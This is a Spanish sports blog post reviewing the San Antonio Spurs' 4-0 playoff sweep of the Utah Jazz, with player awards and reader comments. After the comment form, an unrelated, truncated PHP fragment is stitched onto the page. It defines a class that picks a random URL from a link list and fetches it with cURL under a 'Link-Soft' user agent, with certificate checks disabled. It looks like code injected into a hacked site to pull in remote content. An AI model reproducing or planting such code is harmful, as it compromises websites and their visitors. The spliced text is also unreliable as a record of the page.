Resumen Spurs 4 – Jazz 0

08 de May de 2012 por TheDeerHunter

Análisis previo de la eliminatoria

Una lástima. Feo punto final a la meritoria campaña de los jóvenes Jazz. Nada que objetar a la eliminación. Los Spurs, en condiciones normales, son superiores en casi todos los aspectos. Para repetir lo que lograron los Grizzlies el curso pasado se deberían haber alineado unos cuantos astros. No es lo exigible y lo que suele ocurrir en un enfrentamiento entre 1º y 8º es más lo que ha pasado este año que lo sucedido el anterior. Sí cabe lamentar algo más la imagen. Apenas hemos visto sudar a los Spurs para aplastar a sus rivales como si fueran mosquitos, evidencia de que los Jazz estaban verdes para una postemporada y de que el proyecto está descompensado. Se ha juntado el hambre con las ganas de comer y las carencias de unos con las virtudes de los otros.

De las claves que adelantamos en la previa de la serie cabría destacar una que se señaló en los comentarios. Sólo con el dominio abrumador en el rebote poniendo en liza simultáneamente a Millsap, Favors y Jefferson se ha podido disfrutar de un mínimo de igualdad. Aunque fuera a costa de ser triturados desde fuera. A fin de cuentas, el rendimiento del perímetro de Utah ha dejado mucho que desear. Floja dirección de Harris, inapreciables contribuciones de Hayward y Howard y una floja rotación, incomparable a la rival. Nada que hacer.

Por los Spurs, además de los de siempre, cabe destacar la aportación tanto de Stephen Jackson como de Boris Diaw, así como el ostracismo de Blair, que no sabemos si será indicativo para lo que les espera adelante.

PREMIOS 

MVP: Tony Parker sobradito 21 puntos, 6’5 asistencias). Devin Harris no ha sido capaz de ponerle en aprietos. Grande la imagen del francés intentando convencer a su viejo técnico de que no le racionara minutos.

Rookie: No han sido las actuaciones más brillantes que le hayamos visto a Kawhi Leonard pero a cada una de sus marcas se le ha hecho de noche delante suyo.

Sorpresa: Sólido Stephen Jackson (10 puntos, 3’8 rebotes). En plan ganador como nos gusta verle.

Decepción: El propio Gordon Hayward ha reconocido que la serie ha sido una pesadilla por su parte. A algún otro como Josh Howard habría que echarle de comer a parte.

Esfuerzo en vano: Si hay alguien que se ha dejado el alma en esta serie, así como durante todo el curso, ese ha sido Al Jefferson. Muy dignos 18.3 puntos, 8.5 rebotes, 2.5 asistencias y 1.25 robos.

Comenta

5 comentarios a esta entrada

  1. txusma dice:
    #1

    A Al Jefferson le han dado muchos palos por declarar antes del 4º partido “No veo a nadie ganando a los Spurs”. En plan Guardiola 😀

      Citar

  2. Nacho dice:
    #2

    Nada más que añadir. A pesar de los pésimos PO, me quedo con Hayward, me parece un pedazo de jugador, de los que hacen pegamento de equipo. Mucho premio era para los Jazz llegar hasta aquí, no creo que duela mucho la eliminación.
    Y por parte de los Spurs, tienen a un tipo en estado de gracia. “El tercer mejor base de la historia” porque está un pasito por debajo del “segundo mejor base de la historia”, si realmente está por debajo, que lo dudo.

      Citar

  3. TheDeerHunter dice:
    #3

    El problema de estos comentarios es que igual luego alguien llega al blog de aquí a un tiempo, relee el artículo por casualidad , fuera de contexto, y flipa con vosotros XD XD XD

      Citar

  4. nba dice:
    #4

    Oh lala Parker, parece que esta en plan MVP, se le nota con ganas de hacer sangre, ya veremos que pasara en el enfrentamiento de la siguiente ronda contra CP3 o contra Conley,

      Citar

  5. simon dice:
    #5

    nba:
    Oh lala Parker, parece que esta en plan MVP, se le nota con ganas de hacer sangre, ya veremos que pasara en el enfrentamiento de la siguiente ronda contra CP3 o contra Conley,

    Pues te lo digo yo, que se comerá a quien sea… para mi el MVP de la temporada. Reconozco que a nivel individual las temporadas de Durant y James son mejores pero la temporada de Parker ha sido de MVP

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>